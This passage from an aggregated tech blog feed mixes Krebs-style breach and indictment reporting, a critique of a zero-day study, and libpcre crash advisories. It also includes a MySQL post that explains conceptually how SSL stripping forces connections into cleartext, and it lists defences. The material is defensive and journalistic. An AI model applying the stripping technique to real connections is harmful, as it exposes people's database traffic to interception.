Select Restaurants did not return messages seeking comment. But as with the breach at Cici’s Pizza chains, the breach involving Select Restaurant locations mentioned above appears to have been the result of an intrusion at the company’s POS vendor — Geneva, Ill. based 24×7 Hospitality Technology. 24×7 handles credit and debit card transactions for thousands of hotels and restaurants.

On Feb. 14, 24×7 Hospitality sent a letter to customers warning that its systems recently were hacked by a “sophisticated network intrusion through a remote access application.” Translation: Someone guessed or phished the password that we use to remotely administer point-of-sale systems at its customer locations. 24×7 said the attackers subsequently executed the PoSeidon malware variant, which is designed to siphon card data when cashiers swipe credit cards at an infected cash register (for more on PoSeidon, check out POS Providers Feel Brunt of PoSeidon Malware).

KrebsOnSecurity obtained a copy of the letter (PDF) that 24×7 Hospitality CEO Todd Baker, Jr. sent to Select Restaurants. That missive said even though the intruders apparently had access to all of 24×7 customers’ payment systems, not all of those systems were logged into by the hackers. Alas, this was probably little consolation for Select Restaurants, because the letter then goes on to say that the breach involves all of the restaurants listed on Select’s Web site, and that the breach appears to have extended from late October 2016 to mid-January 2017.

ANALYSIS

From my perspective, organized crime gangs have so completely overrun the hospitality and restaurant point-of-sale systems here in the United States that I just assume my card may very well be compromised whenever I use it at a restaurant or hotel bar/eatery. I’ve received no fewer than three new credit cards over the past year, and I’d wager that in at least one of those cases I happened to have used the card at multiple merchants whose POS systems were hacked at the same time.

But no matter how many times I see it, it’s fascinating to watch this slow motion train wreck play out. Given how much risk and responsibility for protecting against these types of hacking incidents is spread so thinly across the entire industry, it’s little wonder that organized crime gangs have been picking off POS providers for Tier 3 and Tier 4 merchants with PoSeidon en masse in recent years.

I believe one big reason we keep seeing the restaurant and hospitality industry being taken to the cleaners by credit card thieves is that in virtually all of these incidents, the retailer or restaurant has no direct relationships to the banks which have issued the cards that will be run through their hacked POS systems. Rather, these small Tier 3 and Tier 4 merchants are usually buying merchant services off of a local systems integrator who often is in turn reselling access to a third-party payment processing company.

As a result, very often when these small chains or solitary restaurants get hit with PoSeidon, there is no record of a breach that is simple to follow from the breached merchant back to the bank which issued the cards used at those compromised merchants. It is only by numerous financial institutions experiencing fraud from the same restaurants and then comparing notes about possible POS vendors in common among these restaurants that banks and credit unions start to gain a clue about what’s happening and who exactly has been hacked.

But this takes a great deal of time, effort and trust. Meanwhile, the crooks are laughing all the way to the bank. Another reason I find all this fascinating is that the two main underground cybercrime shops that appear to be principally responsible for offloading cards stolen in these Tier 3 and Tier 4 merchant breaches involving PoSeidon — stores like Rescator and Briansdump — both abuse my likeness in their advertisements and on their home pages. Here’s Briansdump:

An advertisement for the carding shop “briansdump[dot]ru” promotes “dumps from the legendary Brian Krebs.” Needless to say, this is not an endorsed site.
Here’s the login page for the rather large stolen credit card bazaar known as Rescator:
The login page for Rescator, a major seller of credit and debit cards stolen in countless attacks targeting retailers, restaurants and hotels.
Point-of-sale malware has driven most of the major retail industry credit card breaches over the past two years, including intrusions at Target and Home Depot, as well as breaches at a ridiculous number of point-of-sale vendors. The malware sometimes is installed via hacked remote administration tools like LogMeIn; in other cases the malware is relayed via “spear-phishing” attacks that target company employees. Once the attackers have their malware loaded onto the point-of-sale devices, they can remotely capture data from each card swiped at that cash register.

Thieves can then sell that data to crooks who specialize in encoding the stolen data onto any card with a magnetic stripe, and using the cards to purchase high-priced electronics and gift cards from big-box stores like Target and Best Buy.

Readers should remember that they’re not liable for fraudulent charges on their credit or debit cards, but they still have to report the unauthorized transactions. There is no substitute for keeping a close eye on your card statements. Also, consider using credit cards instead of debit cards; having your checking account emptied of cash while your bank sorts out the situation can be a hassle and lead to secondary problems (bounced checks, for instance).

Finally, if your credit card is compromised, try not to lose sleep over it: The chances of your finding out how that card was compromised are extremely low. This story seeks to explain why.

Update: March 18, 2:52 p.m. ET: An earlier version of this story referenced Buffalo Wild Wings as a customer of 24×7 Hospitality, as stated on 24×7’s site in a many places (PDF). Buffalo Wild Wings wrote in to say that it does not use the specific POS systems that were attacked, and that it is asking 24×7 to remove their brand and logo from the site.

Top

Netways OSDC 2017: Something Openshift Kubernetes Containers

Postby kris via The Isoblog. »

OSDC 2017 Registration
I will be speaking at the Netways Open Source Data Center Conference, which is in Berlin between May 16 and 18. At work, we are currently busy loading our first two Kubernetes Clusters (Openshift actually) with workloads.

What exactly will be in the slides I do not know, yet, but it will be about our journey at Booking, the transition from automated baremetal provisioning of rather monolithic applications to a more containerized setup and the changes and challenges this brings. It will be very much a snapshot of the state of things at that point in time, and our learnings and perspective then.

Top

Four Men Charged With Hacking 500M Yahoo Accounts

Postby BrianKrebs via Krebs on Security »

“Between two evils, I always pick the one I never tried before.” -Karim Baratov (paraphrasing Mae West)

The U.S. Justice Department today unsealed indictments against four men accused of hacking into a half-billion Yahoo email accounts. Two of the men named in the indictments worked for a unit of the Russian Federal Security Service (FSB) that serves as the FBI’s point of contact in Moscow on cybercrime cases. Here’s a look at the accused, starting with a 22-year-old who apparently did not try to hide his tracks.

According to a press release put out by the Justice Department, among those indicted was Karim Baratov (a.k.a. Kay, Karim Taloverov), a Canadian and Kazakh national who lives in Canada. Baratov is accused of being hired by the two FSB officer defendants in this case — Dmitry Dokuchaev, 33, and Igor Sushchin, 43 — to hack into the email accounts of thousands of individuals.

Karim Baratov (a.k.a. Karim Taloverov), as pictured in 2014 on his own site, mr-karim.com. The license plate on his BMW pictured here is Mr. Karim.
Reading the Justice Department’s indictment, it would seem that Baratov was perhaps the least deeply involved in this alleged conspiracy. That may turn out to be true, but he also appears to have been the least careful about hiding his activities, leaving quite a long trail of email hacking services that took about 10 minutes of searching online to trace back to him specifically.

Security professionals are fond of saying that any system is only as secure as its weakest link. It would not be at all surprising if Baratov was the weakest link in this conspiracy chain.

A look at Mr. Baratov’s Facebook and Instagram photos indicates he is heavily into high-performance sports cars. His profile picture shows two of his prized cars — a Mercedes and an Aston Martin — parked in the driveway of his single-family home in Ontario.

A simple reverse WHOIS search at domaintools.com on the name Karim Baratov turns up 81 domains registered to someone by this name in Ontario. Many of those domains include the names of big email providers like Google and Yandex, such as accounts-google[dot]net and www-yandex[dot]com.

Other domains appear to be Web sites selling email hacking services. One of those is a domain registered to Baratov’s home address in Ancaster, Ontario called infotech-team[dot]com. A cached copy of that site from archive.org shows this once was a service that offered “quality mail hacking to order, without changing the password.” The service charged roughly $60 per password.

Archive.org’s cache of infotech-team.com, an email hacking service registered to Baratov.
The proprietors of Infotech-team[dot]com advertise the ability to steal email account passwords without actually changing the victim’s password. According to the Justice Department, Baratov’s service relied on “spear phishing” emails that targeted individuals with custom content and enticed the recipient into clicking a link.

Antimail[dot]org is another domain registered to Baratov that was active between 2013 and 2015. It advertises “quality-mail hacking to order!”:



Another email hacking business registered to Baratov is xssmail[dot]com, which also has for several years advertised the ability to break into email accounts of virtually all of the major Webmail providers. XSS is short for “cross-site-scripting.” XSS attacks rely on vulnerabilities in Web sites that don’t properly parse data submitted by visitors in things like search forms or anyplace one might enter data on a Web site.

In the context of phishing links, the user clicks the link and is actually taken to the domain he or she thinks she is visiting (e.g., yahoo.com) but the vulnerability allows the attacker to inject malicious code into the page that the victim is visiting.

This can include fake login prompts that send any data the victim submits directly to the attacker. Alternatively, it could allow the attacker to steal “cookies,” text files that many sites place on visitors’ computers to validate whether they have visited the site previously, as well as if they have authenticated to the site already.

Archive.org’s cache of xssmail.com
Perhaps instead of or in addition to using XSS attacks in targeted phishing emails, Baratov also knew about or had access to other cookie-stealing exploits collected by another accused in today’s indictments: Russian national Alexsey Alexseyevich Belan.

According to government investigators, Belan has been on the FBI’s Cyber Most Wanted list since 2013 after breaking into and stealing credit card data from a number of e-commerce companies. In June 2013, Belan was arrested in a European country on request from the United States, but the FBI says he was able to escape to Russia before he could be extradited to the U.S.

A screenshot from the FBI’s Cyber Most Wanted List for Alexsey Belan.
The government says the two other Russian nationals who were allegedly part of the conspiracy to hack Yahoo — the aforementioned FSB Officers Dokuchaev and Sushchin — used Belan to gain unauthorized access to Yahoo’s network. Here’s what happened next, according to the indictments:

“In or around November and December 2014, Belan stole a copy of at least a portion of Yahoo’s User Database (UDB), a Yahoo trade secret that contained, among other data, subscriber information including users’ names, recovery email accounts, phone numbers and certain information required to manually create, or ‘mint,’ account authentication web browser ‘cookies’ for more than 500 million Yahoo accounts.

“Belan also obtained unauthorized access on behalf of the FSB conspirators to Yahoo’s Account Management Tool (AMT), which was a proprietary means by which Yahoo made and logged changes to user accounts. Belan, Dokuchaev and Sushchin then used the stolen UDB copy and AMT access to locate Yahoo email accounts of interest and to mint cookies for those accounts, enabling the co-conspirators to access at least 6,500 such accounts without authorization.”

U.S. investigators say Dokuchaev was an FSB officer assigned to Second Division of FSB Center 18, also known as the FSB Center for Information Security. Dokuchaev’s colleague Sushchin was an FSB officer and embedded as a purported employee and Head of Information Security at a Russian financial firm, where he monitored the communications of the firm’s employees.



According to the Justice Department, some victim accounts that Dokuchaev and Sushchin asked Belan and Baratov to hack were of predictable interest to the FSB (a foreign intelligence and law enforcement service), such as personal accounts belonging to Russian journalists; Russian and U.S. government officials; employees of a prominent Russian cybersecurity company; and numerous employees of other providers whose networks the conspirators sought to exploit. Other personal accounts belonged to employees of commercial entities, such as a Russian investment banking firm, a French transportation company, U.S. financial services and private equity firms, a Swiss bitcoin wallet and banking firm and a U.S. airline.

“During the conspiracy, the FSB officers facilitated Belan’s other criminal activities, by providing him with sensitive FSB law enforcement and intelligence information that would have helped him avoid detection by U.S. and other law enforcement agencies outside Russia, including information regarding FSB investigations of computer hacking and FSB techniques for identifying criminal hackers,” the Justice Department charged in its press statement about the indictments.

“Additionally, while working with his FSB conspirators to compromise Yahoo’s network and its users, Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic,” the government alleges.



Each of the four men face 47 criminal charges, including conspiracy, computer fraud, economic espionage, theft of trade secrets and aggravated identity theft.

Dokuchaev, who is alleged to have used the hacker nickname “Forb,” was arrested in December in Moscow. According to a report by the Russian news agency Interfax, Dokuchaev was arrested on charges of treason for alleging sharing information with the U.S. Central Intelligence Agency (CIA). For more on that treason case, see my Jan. 28, 2017 story, A Shakeup in Russia’s Top Cybercrime Unit.

For more on Dokuchaev’s allegedly checkered past (Russian news sites report that he went to work for the FSB to avoid being prosecuted for bank fraud) check out this fascinating story from Russian news outlet Vedomosti, which featured an interview with the hacker Forb from 2004.

In September 2016, Yahoo first disclosed the theft of 500 million accounts that is being attributed to this conspiracy. But in December 2016, Yahoo acknowledged a separate hack from 2013 had jeopardized more than a billion user accounts.

The New York Times reports that Yahoo said it has not been able to glean much information about that attack, which was uncovered by InfoArmor, an Arizona security firm. Interestingly, that attack also involved the use of forged Yahoo cookies, according to a statement from Yahoo’s chief information security officer.

The one alleged member of this conspiracy who would have been simple to catch is Baratov, as he does not appear to have hidden his wealth and practically peppers the Internet with pictures of six-digit sports cars he has owned over the years.

Baratov was arrested on Tuesday in Canada, where the matter is now pending with Canadian authorities. U.S. prosecutors are now trying to seize Baratov’s black Mercedes Benz C54 and his Aston Martin DBS, arguing that they were purchased with the proceeds from cybercrime activity.

A redacted copy of the indictment is available here.

Update, Mar. 16, 5:20 p.m. ET: A previous caption on one of the above photos misidentified the make and model of a car. Also, an earlier version of this story incorrectly stated that Yahoo had attributed its 2013 breach to a state-sponsored actor; the company says it has not yet attributed that intrusion to any one particular actor.
Top

The secret of on-time trains!

Postby kris via The Isoblog. »

German Rail, notoriously late, can maybe learn a thing from NS, according to this article, because they have cracked the secret to avoid late trains:

Smartwatches for platform personnel.

Okay, I can see the value:

Met de app kunnen de conducteurs op het horloge de actuele vertrekinfo zien. Vlak voor het moment dat de trein moet vertrekken, trilt het horloge. Daardoor weet de conducteur dat hij in actie moet komen en moet kijken of iedereen is ingestapt. Volgens ProRail scheelt dat seconden en in sommige gevallen minuten.

(Using the app the platform personnel can see current travel information, and is being informed about departure time with the clock vibrating. […] This can save seconds, and in some cases, minutes)

Still the entire presentation might be somewhat overenthusiastic… 🙂
Top

MySQL and encrypted connections

Postby kris via The Isoblog. »

2006 slides by Rasmus Lerdorf
Since 5.0, MySQL does allow natively encrypted connections to the database, and supposedly also does support client certs for user authentication. Supposedly, because I never tried.

MySQL as a database performs well with transient connections as they are prevalent in two-tier deployments (mod_php, mod_perl, mod_python to database), in which a database connection is made upon web request, and the connection is torn down at the end of the request. This model does not scale so well with encryption in the mix, as on connection a full TLS/SSL exchange must be made.

The talk given by Rasmus Lerdorf starts out with Postgres, and then switches to MySQL, but the big gain at the beginning is really from dropping the TLS/SSL connection establishment overhead, not from anything else. It would be the same, no matter what database is doing the work behind that channel.

For customers who had the need of talking to the database on a secure channel, I always recommended a VPN tunnel such as IPsec, openvpn or similar, and then connecting in clear through it. This not only avoids connection establishment/teardown overhead, but also secures all other administrative communication to the server that will happen, but typically does not use the MySQL protocol (such as backups, bulk downloads of dumps and other traffic).

Daniël van Eeden has been less lazy than me:

In conversation with Daniël I learned a few more things. For example, I always thought that community MySQL is linked against OpenSSL, and Enterprise MySQL uses YaSSL for license reasons, but that is a) wrong and b) a problem.

It is wrong, because apparently OpenSSL uses it’s own little license and that one appears to be GPL incompatible (like about any license that is not the GPL itself).

It’s yaSSL that’s GPL. But – yaSSL is dying, and the replacement product is WolfSSL, which is also GPL’ed, but not used by MySQL, yet.

OTOH, Daniël pointed out that current versions of xtrabackup seem to be linked against OpenSSL, which would have to be changed (or the license situation cleared up otherwise).

So – it’s complicated already at the organisational and licensing level, before you even start to dive into the tech specifics.

Anyway, Daniël is planning more articles about MySQL and encryption in his blog, so if you aren’t subscribed, do it now.
Top

Zero Days and Cargo Cult Science

Postby Hanno Böck via Hanno's blog »

I've complained in the past about the lack of rigorous science in large parts of IT security. However there's no lack of reports and publications that claim to provide data about this space.

Recently RAND Corporation, a US-based think tank, published a report about zero day vulnerabilities. Many people praised it, an article on Motherboard quotes people saying that we finally have “cold hard data” and quoting people from the zero day business who came to the conclusion that this report clearly confirms what they already believed.

I read the report. I wasn't very impressed. The data is so weak that I think the conclusions are almost entirely meaningless.

The story that is spun around this report needs some context: There's a market for secret security vulnerabilities, often called zero days or 0days. These are vulnerabilities in IT products that some actors (government entities, criminals or just hackers who privately collect them) don't share with the vendor of that product or the public, so the vendor doesn't know about them and can't provide a fix.

One potential problem of this are bug collisions. Actor A may find or buy a security bug and choose to not disclose it and use it for its own purposes. If actor B finds the same bug then he might use it to attack actor A or attack someone else. If A had disclosed that bug to the vendor of the software it could've been fixed and B couldn't have used it, at least not against people who regularly update their software. Depending on who A and B are (more or less democratic nation states, nation states in conflict with each other or simply criminals) one can argue how problematic that is.

One question that arises here is how common that is. If you found a bug – how likely is it that someone else will find the same bug? The argument goes that if this rate is low then stockpiling vulnerabilities is less problematic. This is how the RAND report is framed. It tries to answer that question and comes to the conclusion that bug collisions are relatively rare. Thus many people now use it to justify that zero day stockpiling isn't so bad.

The data is hardly trustworthy

The basis of the whole report is an analysis of 207 bugs by an entity that shared this data with the authors of the report. It is incredibly vague about that source. They name their source with the hypothetical name BUSBY.

We can learn that it's a company in the zero day business and indirectly we can learn how many people work there on exploit development. Furthermore we learn: “Some BUSBY researchers have worked for nation-states (so
their skill level and methodology rival that of nation-state teams), and many of BUSBY’s products are used by nation-states.” That's about it. To summarize: We don't know where the data came from.

The authors of the study believe that this is a representative data set. But it is not really explained why they believe so. There are numerous problems with this data:
  • We don't know in which way this data has been filtered. The report states that 20-30 bugs “were removed due to operational sensitivity”. How was that done? Based on what criteria? They won't tell you. Were the 207 bugs plus the 20-30 bugs all the bugs the company had found or was this already pre-filtered? They won't tell you.
  • It is plausible to assume that a certain company focuses on specific bugs, has certain skills, tools or methods that all can affect the selection of bugs and create biases.
  • Oh by the way, did you expect to see the data? Like a table of all the bugs analyzed with the at least the little pieces of information BUSBY was willing to share? Because you were promised to see cold hard data? Of course not. That would mean others could reanalyze the data, and that would be unfortunate. The only thing you get are charts and tables summarizing the data.
  • We don't know the conditions under which this data was shared. Did BUSBY have any influence on the report? Were they allowed to read it and comment on it before publication? Did they have veto rights to the publication? The report doesn't tell us.

Naturally BUSBY has an interest in a certain outcome and interpretation of that data. This creates a huge conflict of interest. It is entirely possible that they only chose to share that data because they expected a certain outcome. And obviously the reverse is also true: Other companies may have decided not to share such data to avoid a certain outcome. It creates an ideal setup for publication bias, where only the data supporting a certain outcome is shared.

It is inexcusable that the problem of conflict of interest isn't even mentioned or discussed anywhere in the whole report.

A main outcome is based on a very dubious assumption

The report emphasizes two main findings. One is that the lifetime of a vulnerability is roughly seven years. With the caveat that the data is likely biased, this claim can be derived from the data available. It can reasonably be claimed that this lifetime estimate is true for the 207 analyzed bugs.

The second claim is about the bug collision rate and is much more problematic:
“For a given stockpile of zero-day vulnerabilities, after a year, approximately 5.7 percent have been discovered by an outside entity.”

Now think about this for a moment. It is absolutely impossible to know that based on the data available. This would only be possible if they had access to all the zero days discovered by all actors in that space in a certain time frame. It might be possible to extrapolate this if you'd know how many bugs there are in total on the market - but you don't.

So how does this report solve this? Well, let it speak for itself:

Ideally, we would want similar data on Red (i.e., adversaries of Blue, or other private-use groups), to examine the overlap between Blue and Red, but we could not obtain that data. Instead, we focus on the overlap between Blue and the public (i.e., the teal section in the figures above) to infer what might be a baseline for what Red has. We do this based on the assumption that what happens in the public groups is somewhat similar to what happens in other groups. We acknowledge that this is a weak assumption, given that the composition, focus, motivation, and sophistication of the public and private groups can be fairly different, but these are the only data available at this time. (page 12)

Okay, weak assumption may be the understatement of the year. Let's summarize this: They acknowledge that they can't answer the question they want to answer. So they just answer an entirely different question (bug collision rate between the 207 bugs they have data about and what is known in public) and then claim that's about the same. To their credit they recognize that this is a weak assumption, but you have to read the report to learn that. Neither the summary nor the press release nor any of the favorable blog posts and media reports mention that.

If you wonder what the Red and Blue here means, that's also quite interesting, because it gives some insights about the mode of thinking of the authors. Blue stands for the “own team”, a company or government or anyone else who has knowledge of zero day bugs. Red is “the adversary” and then there is the public. This is of course a gross oversimplification. It's like a world where there are two nation states fighting each other and no other actors that have any interest in hacking IT systems. In reality there are multiple Red, Blue and in-between actors, with various adversarial and cooperative relations between them.

Sometimes the best answer is: We don't know

The line of reasoning here is roughly: If we don't have good data to answer a question, we'll just replace it with bad data.

I can fully understand the call for making decisions based on data. That is usually a good thing. However, it may simply be that this is a scenario where getting reliable data is incredibly hard or simply impossible. In such a situation the best thing one can do is admit that and live with it. I don't think it's helpful to rely on data that's so weak that it's basically meaningless.

The core of the problem is that we're talking about an industry that wants to be secret. This secrecy is in a certain sense in direct conflict with good scientific practice. Transparency and data sharing are cornerstones of good science.

I should mention here that shortly afterwards another study was published by Trey Herr and Bruce Schneier which also tries to answer the question of bug collisions. I haven't read it yet, from a brief look it seems less bad than the RAND report. However I have my doubts about it as well. It is only based on public bug findings, which is at least something that has a chance of being verifiable by others. It has the same problem that one can hardly draw conclusions about the non-public space based on that. (My personal tie in to that is that I had a call with Trey Herr a while ago where he asked me about some of my bug findings. I told him my doubts about this.)

The bigger picture: We need better science

IT security isn't a field that's rich of rigorous scientific data.

There's a lively debate right now going on in many fields of science about the integrity of their methods. Psychologists had to learn that many theories they believed for decades were based on bad statistics and poor methodology and are likely false. Whenever someone tries to replicate other studies the replication rates are abysmal. Smart people claim that the majority scientific outcomes are not true.

I don't see this debate happening in computer science. It's certainly not happening in IT security. Almost nobody is doing replications. Meta analyses, trials registrations or registered reports are mostly unheard of.

Instead we have cargo cult science like this RAND report thrown around as “cold hard data” we should rely upon. This is ridiculous.

I obviously have my own thoughts on the zero days debate. But my opinion on the matter here isn't what this is about. What I do think is this: We need good, rigorous science to improve the state of things. We largely don't have that right now. And bad science is a poor replacement for good science.
Top

Docker Image Vulnerability Research

Postby kris via The Isoblog. »

federacy reports “24% of the latest Docker images have significant vulnerabilities“.

The Report underlines the importance of running your own image building service and your own local registry when deploying Docker and Kubernetes.

And that includes the base operating system images, because the test above focused on latest images of official docker images of base operating system images, and known vulnerabilities in it. It lists last years vulnerabilities still being present in current images.

In their own words:

[…] we decided to put our technology to work to answer a key question: what is the current state of vulnerabilities in official Docker repositories?

[…] On February 6th, we scanned 91 of the 133 official Docker repositories. This is every repository with a ‘latest’ tagged image consisting of a major linux distribution and a functional package manager.

It also underlines that looking into images, and reporting versions of things you build on using Container technology is really important for a functional compliance and security management strategy. Packaging, Package Managers and useful versioning of stuff does not go away at all with Containers.
Top

Network attacks on MySQL, Part 2: SSL stripping with MySQL

Postby Daniël van Eeden via Daniël's Database Blog »

Intro

In my previous blog post I told you to use SSL/TLS to secure your MySQL network connections. So I followed my advice and did enable SSL. Great!

So first let's quickly verify that everything is working.

So you enabled SSL with mysql_ssl_rsa_setup, used a OpenSSL based build or put ssl-cert, ssl-key and ssl-ca in the mysqld section of your /etc/my.cnf and now show global variables like 'have_SSL'; returns 'YES'.

And you have configured the client with --ssl-mode=PREFERRED. Now show global status like 'Ssl_cipher'; indicates the session is indeed secured.

You could also dump traffic and it looks 'encrypted' (i.e. not readable)...

With SSL enabled everything should be safe isn't it?

The handshake which MySQL uses always starts unsecured and is upgraded to secured if both the client and server have the SSL flag set. This is very similar to STARTTLS as used in the SMTP protocol.

To attach this we need an active attack; we need to actually sit in between the client and the server and modify packets.

Then we modify the flags sent from the server to the client to have the SSL flag disabled. This is called SSL stripping.

Because the client thinks the server doesn't support SSL the connection is not upgraded and continues in clear text.

An example can be found in the dolfijn_stripssl.py script.

Once the SSL layer is stripped from the connection an attacker can see your queries and resultsets again as described before.

To protect against this attack:

  1. Set REQUIRE SSL on accounts which should never use unencrypted connections.
  2. On the client use --ssl-mode=REQUIRED to force the use of SSL. This is available since 5.6.30 / 5.7 11.
  3. For older clients: Check the Ssl_cipher status variable and exit if it is empty.
Top

Extreme Sports: Racing the Tube

Postby kris via The Isoblog. »

I am the last person to learn about the 2014 extreme sports that is Racing The Tube, which is leaving a subway car at one station, and entering the same car at the next station. Like so:

London

Stockholm

Warsaw


Moscow

Hongkong

Top

Tumblr of the Day: Maps on the Web

Postby kris via The Isoblog. »

Maps on the Web, what if every secession was successful?
(only the post above: here)
Top

Kamergotchi

Postby kris via The Isoblog. »

Leider endet das Spiel morgen: In Kamergotchi muß der spielende Niederländer seinen Abgeordneten am Leben halten.

Kamergotchi, het ideale spel voor de betrokken kiezer. Hou je lijsttrekker zo lang mogelijk in leven door hem eten, aandacht of kennis te geven. Zoveel politieke invloed had je nog nooit!

Top

Tumblr of the Day: If Hemingway wrote Javascript

Postby kris via The Isoblog. »

Tumblr of the Day is a Github: angus-c/literary.js.

It is also available as a Kindle Book.


master/book/carroll/prime.js:

function downTheRabbitHole(growThisBig) {
  var theFullDeck = Array(growThisBig);
  var theHatter = Function('return this/4').call(2*2);
  var theDuchess = Boolean("The frumious Bandersnatch!");

  var theVerdict = "the white rabbit".split(/the march hare/).slice(theHatter);

  //into the pool of tears...
  eval(theFullDeck.join("if (!theFullDeck[++theHatter]) {\
      theDuchess = 1;\
      theVerdict.push(theHatter);\
      " + theFullDeck.join("theFullDeck[++theDuchess * theHatter]=true;") + "}")
  );

  return theVerdict;
}
Top

Adobe, Microsoft Push Critical Security Fixes

Postby BrianKrebs via Krebs on Security »

Adobe and Microsoft each pushed out security updates for their products today. Adobe plugged at least seven security holes in its Flash Player software. Microsoft, which delayed last month’s Patch Tuesday until today, issued an unusually large number of update bundles (18) to fix dozens of flaws in Windows and associated software.

Microsoft’s patch to fix at least five critical bugs in the Windows file-sharing service is bound to make a great deal of companies nervous before they get around to deploying this week’s patches. Most organizations block internal file-sharing networks from talking directly to their Internet-facing networks, but these flaws could be exploited by a malicious computer worm to spread very quickly once inside an organization with a great many unpatched Windows systems.

Another critical patch (MS17-013) covers a slew of dangerous vulnerabilities in the way Windows handles certain image files. Malware or miscreants could exploit the flaws to foist malicious software without any action on the part the user, aside from perhaps just browsing to a hacked or booby-trapped Web site.

According to a blog post at the SANS Internet Storm Center, the image-handling flaw is one of six bulletins Microsoft released today which include vulnerabilities that have either already been made public or that are already being exploited. Several of these are in Internet Explorer (CVE 2017-0008/MS17-006) and/or Microsoft Edge (CVE-2017-0037/MS17-007).

For a more in-depth look at today’s updates from Microsoft, check out this post from security vendor Qualys.

And as per usual, Adobe used Patch Tuesday as an occasion to release updates for its Flash Player software. The latest update brings Flash to v. 25.0.0.127 for Windows, Mac and Linux users alike. If you have Flash installed, you should update, hobble or remove Flash as soon as possible. To see which version of Flash your browser may have installed, check out this page.

The smartest option is probably to ditch the program once and for all and significantly increase the security of your system in the process. An extremely powerful and buggy program that binds itself to the browser, Flash is a favorite target of attackers and malware. For some ideas about how to hobble or do without Flash (as well as slightly less radical solutions) check out A Month Without Adobe Flash Player.

If you choose to keep Flash, please update it today. The most recent versions of Flash should be available from the Flash home page. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

Chrome and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates in and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version. When in doubt, click the vertical three dot icon to the right of the URL bar, select “Help,” then “About Chrome”: If there is an update available, Chrome should install it then.

Finally, Adobe also issued a patch for its Shockwave Player, which is another program you should probably ditch if you don’t have a specific need for it. The long and short of it is that Shockwave often contains the same exploitable Flash bugs but doesn’t get patched anywhere near as often as Flash. Please read Why You Should Ditch Adobe Shockwave if you have any doubts on this front.

As always, if you experience any issues downloading or installing any of these updates, please leave a note about it in the comments below.
Top

How does the 8008 processor work?

Postby kris via The Isoblog. »

The historic 8008 processor is 45 years old: It was released on the 13th of March 1972. Ken Shirriff has a blog post that explains features of the CPU, from a die photo.

Compared to modern CPUs, the 8008 is weird in multiple ways: The storage for the stack is on chip instead of in memory, and it is not accessed in linear order for weird transistor saving reasons.

Things have changed since then a lot, but back then, a central processing unit was usually not a single die, but a bunch of discrete electronics on a board. Having enough transistors on a single die to make up a CPU inside a chip was a novel concept.

Die photos and analysis of the revolutionary 8008 microprocessor, 45 years old

Reverse-engineering the surprisingly advanced ALU of the 8008 microprocessor

Analyzing the vintage 8008 processor from die photos: its unusual counters
Top

Ist ja bald Weihnachten: Flying Flame Thrower

Postby kris via The Isoblog. »

In Germany, the Bundesrat has asked for a relaxation (article in German) of the new Drone regulations to better accomodate Model Plane Flying as a sport.

Meanwhile, in China, we get flying flame throwers. I want one:

 

Top

Lab::Measurement at the DPG Spring Meeting Dresden 2017

Postby Andreas via the dilfridge blog »

As nearly every year we'll present a poster on Lab::Measurement at the spring meeting of the German Physical Society again. This time the conference is in Dresden - so visit us on upcoming 23 March 2017, 15:00-19:00, poster session TT75, poster TT75.7!
Top

libpcre: invalid memory read in match (pcre_exec.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed an invalid read in the library. For who is interested in a detailed description of the bug, will follow a feedback from upstream:

This was a genuine bug in the 32-bit library. Thanks for finding it. The crash was caused by trying to find a Unicode property for a code value greater than 0x10ffff, the Unicode maximum, when running in non-UTF mode (where character values can be up to 0xffffffff). The bug was in both PCRE1 and PCRE2. I have fixed both of them.

The complete ASan output:

# pcretest -32 -d $FILE
==14788==ERROR: AddressSanitizer: SEGV on unknown address 0x7f1bbffed4df (pc 0x7f1bbee3fe6b bp 0x7fff8b50d8c0 sp 0x7fff8b50d3a0 T0)
==14788==The signal is caused by a READ memory access.
    #0 0x7f1bbee3fe6a in match /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:5473:18
    #1 0x7f1bbee09226 in pcre32_exec /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:6936:8
    #2 0x527d6c in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5218:9
    #3 0x7f1bbddd678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:5473:18 in match
==14788==ABORTING
Affected version:
8.40 and 10.23

Fixed version:
8.41 and 10.24 (not released atm)

Commit fix for libpcre1:
https://vcs.pcre.org/pcre/code/trunk/pcre_internal.h?r1=1649&r2=1688&sortby=date
https://vcs.pcre.org/pcre/code/trunk/pcre_ucd.c?r1=1490&r2=1688&sortby=date

Commit fix for libpcre2:
https://vcs.pcre.org/pcre2/code/trunk/src/pcre2_ucd.c?r1=316&r2=670&sortby=date
https://vcs.pcre.org/pcre2/code/trunk/src/pcre2_internal.h?r1=600&r2=670&sortby=date

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-7186

Reproducer:
https://github.com/asarubbo/poc/blob/master/00204-pcre-invalidread1-pcre_exec

Timeline:
2017-02-23: bug discovered and reported to upstream
2017-02-24: upstream released a patch
2017-03-14: blog post about the issue
2017-03-19: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in match (pcre_exec.c)

Top

libpcre: NULL pointer dereference in main (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed a null pointer dereference in the utility itself. For the nature of the crash, it is not security relevant because the library is not affected but if you have a web application that calls directly the pcretest utility to parse untrusted data, then you are affected.
Also, it is important share the details because some distros/packagers may want to take the patch in their repository.

The complete ASan output:

# pcretest -16 -d $FILE
